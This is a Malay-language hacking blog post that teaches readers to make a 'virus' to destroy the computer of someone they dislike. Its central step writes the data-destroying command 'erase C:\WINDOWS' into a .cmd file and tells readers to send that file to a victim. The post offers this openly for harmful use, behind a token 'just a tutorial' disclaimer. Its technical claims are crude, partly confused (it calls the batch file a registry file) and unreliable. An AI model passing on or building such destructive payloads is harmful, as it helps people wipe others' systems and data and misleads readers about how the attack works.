Cipta Virus Pemusnah Dalam 1 Minit!

Assalamualaikum The Hykerz sekalian..
korang dah bersedia nak belajar cara-cara nak jahanamkan PC
orang yang korang meluat tengok muka dia hari-hari? mencipta virus yang mudah tapi mampu memusnahkan?
(ini hanya sekadar tutorial sahaja..korang betul-betul nak aplikasi kan, itu hak korang ye)

AMARAN : JANGAN LANCARKAN VIRUS INI DI KOMPUTER ANDA SENDIRI ATAU ANDA AKAN KEHILANGAN WINDOWS!

Begini kaedahnya:

1. Buka Notepad

2. Taipkan erase C:\WINDOWS
3. Savekan namanya sebagai NAMA-APA-APA-YANG-KORANG-SUKA.cmd
4. Hantarkan Virus ini kepada mangsa..
apabila ia dilancarkan, keseluruhan windows akan di-delete oleh Virus ini..
daripada command tu pun korang dah boleh baca apa yang diarahkan..
ERASE C WINDOWS..
maknanya PADAM/DELETE WINDOWS C..


senang aje benda ni..jangan sakitkan kepala..
aku bagi benda yang senang-senang je orang nak faham..sebab apa? sebab Admin blog ni yang lagi sorang (Admin pemantau iaitu juaratempur), beliau yang tegur aku..katanya bukan semua orang yang bukak blog ni mahir dalam ICT..jadi kalau boleh setiap artikel/entry haruslah tepat dengan tema blog ni iaitu 'Simple Hacking Tips n Tutorial'..jadi aku nak 'make it simple', aku fikir-fikir balik betul jugak..
oleh itu kepada sesiapa yang tak faham, tanya la ya..kalau Mr.Hac boleh jawab, Mr.Hac akan jawab..kalau Mr.Hac sendiri pun tak reti, Mr.Hac akan cakap 'tak tau' aje la ye..


bukan apa..ada sesetengah orang mungkin tak faham macam mana nak cipta registry file daripada notepad..benda tu hanya perlu Salin-Tampal-Simpan@Simpan Sebagai (Copy-Paste-Save@Save As) dari blog aku ni..tapi aku fikir-fikir balik logik jugak Admin juaratempur cakap tu..bukan semua faham kan..oleh itu, apa-apa masalah, tanya aje la..tapi jawapan belum tentu aku boleh bagi sebab aku pun bukannya pandai sangat..heheh..


sekian sahaja la kali ni..apa-apa hal, sila komen kat bawah ya..



Powered by Blogger.